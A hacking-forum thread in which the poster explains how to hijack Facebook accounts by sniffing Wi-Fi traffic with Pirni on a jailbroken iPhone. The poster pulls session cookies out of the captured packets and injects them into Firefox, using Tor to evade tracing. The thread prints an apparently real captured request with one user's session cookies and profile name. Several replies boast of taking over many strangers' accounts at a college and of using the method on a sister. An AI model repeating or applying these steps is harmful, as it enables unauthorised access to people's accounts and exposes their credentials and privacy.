basic : how to hijack facebook account ( cookie injection )

[Markanees]

this my first tut i hope its useful
need : idevice ( jailbroken with pirni pro or pirni installed )
         PC ( with firefox + ((cookie manger + )) + tor network so facebook don't recored  your ip )
         some time
procedures
connect to wifi network start pirni ( pro or normal one )
get some packets ( log.pcap )
now PC time
open the log.pcap on pc ( with wireshark or any tool even text )
now look for facebook packets it will look like this

Code: [Select]


Host: www.facebook.com

Connection: keep-alive

Content-Length: 233

Origin: http://www.facebook.com

X-SVN-Rev: 652946

User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4

Content-Type: application/x-www-form-urlencoded

Accept: */*

Referer: http://www.facebook.com/nony.elkady

Accept-Encoding: gzip,deflate,sdch

Accept-Language: en-US,en;q=0.8

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Cookie: c_user=100000517860822; datr=CJZyUA-x4FfIBMmFat0obNAE; fr=01sl1czc2BBBGWWU1.AWVaUOcUdmpaq94ceDOMHwVYkbw.BQPxY3.lk.AWWuf_e4; lu=RgfJYIrl5De0BzCGOmxrfX4g; xs=60%3A36mF4_dOjxRJ0Q%3A0%3A1350895153; locale=ar_AR; sub=3; p=1; presence=EM350895720EuserFA21B00517860822A2EstateFDsb2F0Et2F_5b_5dElm2FnullEuct2F1350894554BEtrFA2loadA2EtwF2672587532EatF1350895719960G350895720443CEchFDp_5f1B00517860822F20CC; act=1350895731172%2F18%3A2; _e_0y4D_14=%5B%220y4D%22%2C1350895731173%2C%22act%22%2C1350895731172%2C18%2C%22http%3A%2F%2Fwww.facebook.com%2Fnony.elkady%23%22%2C%22click%22%2C%22click%22%2C%22timeline_recent%22%2C%22r%22%2C%22%2Fnony.elkady%22%2C%7B%22ft%22%3A%7B%22tn%22%3A%22%3E%3D%22%2C%22type%22%3A20%7D%2C%22gt%22%3A%7B%22eventtime%22%3A%221350895946%22%2C%22viewerid%22%3A%22100000517860822%22%2C%22profileownerid%22%3A%22100001845494128%22%2C%22unitimpressionid%22%3A%22a71b72a4%22%2C%22contentid%22%3A%227327848880440199018%22%2C%22timeline_unit_type%22%3á        
P‰§
êê
ÛXáB|áÕ5[EÜö@â
UBܘÅOP•‰?¥ðÓÁP
}SPOST /ajax/ufi/like.php HTTP/1.1
forget all of it look only on COOKIES
now copy the cookies in new text file and sort it like this
-c_user=100000517860822
-datr=CJZyUA-x4FfIBMmFat0obNAE
-fr=01sl1czc2BBBGWWU1.AWVaUOcUdmpaq94ceDOMHwVYkbw.BQPxY3.lk.AWWuf_e4; lu=RgfJYIrl5De0BzCGOmxrfX4g
-lu=RgfJYIrl5De0BzCGOmxrfX4g
-xs=60%3A36mF4_dOjxRJ0Q%3A0%3A1350895153
-p=1
-sub=3
-presence=EM350895720EuserFA21B00517860822A2EstateFDsb2F0Et2F_5b_5dElm2FnullEuct2F1350894554BEtrFA2loadA2EtwF2672587532EatF1350895719960G350895720443CEchFDp_5f1B00517860822F20CC
-act=1350895731172%2F18%3A2
 now these are the account we are going to hijack
open firefox and go to facebook.com
open cookies manger+
inject the cookies as its
close
refresh facebook page now you are in the account

thanks to @hunterbeckham
hope it helps
have fun everyone

[Apetrick]

Facebook uses ssl so you would also have to be running that which isnt possible on idevice ATM, it's best just to use a computer

[Markanees]

i  just use idevice
to get the cookies as its easier to hold than a pc
btw it works  i hijacked many accounts by it
the only way it won't work 
user log out so the session is ended
and the cookies expire after certain time

[Apetrick]

i  just use idevice
to get the cookies as its easier to hold than a pc
btw it works  i hijacked many accounts by it
the only way it won't work 
user log out so the session is ended
and the cookies expire after certain time

Oh ok, I was told that Facebook moved over to complete ssl. And yes almost all cookies will expire so you gotta be quick about it.

[Markanees]

it won't expire if the user pressed remember me cookie will last forever
you may give it  a try and see

[Apetrick]

it won't expire if the user pressed remember me cookie will last forever
you may give it  a try and see

I did it last night with my sister, I already had her password but it's still cool to use cookie injection.

[Markanees]

i used it at college hijacked many accounts ( students , doctors , employers ) it's very cool i agree with you

[Alex47]

Sweet! Not very knowledgable in cookies so this helped a lot thanks

[Markanees]

+1 would be appreciated

[OneHappyTaco]

Very good! +1 Facebook may have SSL... But we have ass-kicking cookie injection manipultion

[darrenliew96]

Is there any cookie manager for iOS?

[Markanees]

there is a post in hacking support about cookies
you can use javascript to inject the cookies
and UAfaker to fake the browser

[darrenliew96]

Thanks! I didn't notice that.

[Pfcdaoe]

Great information guys

But,

I don't see how or where you choose what facebook account your selecting.

Please advise

Thanks (:

[Markanees]

Great information guys

But,

I don't see how or where you choose what facebook account your selecting.

Please advise

Thanks (:

It's random you will have a punch of cookies it may all refer to one account
But with wireshark it sort the cookies according to ip address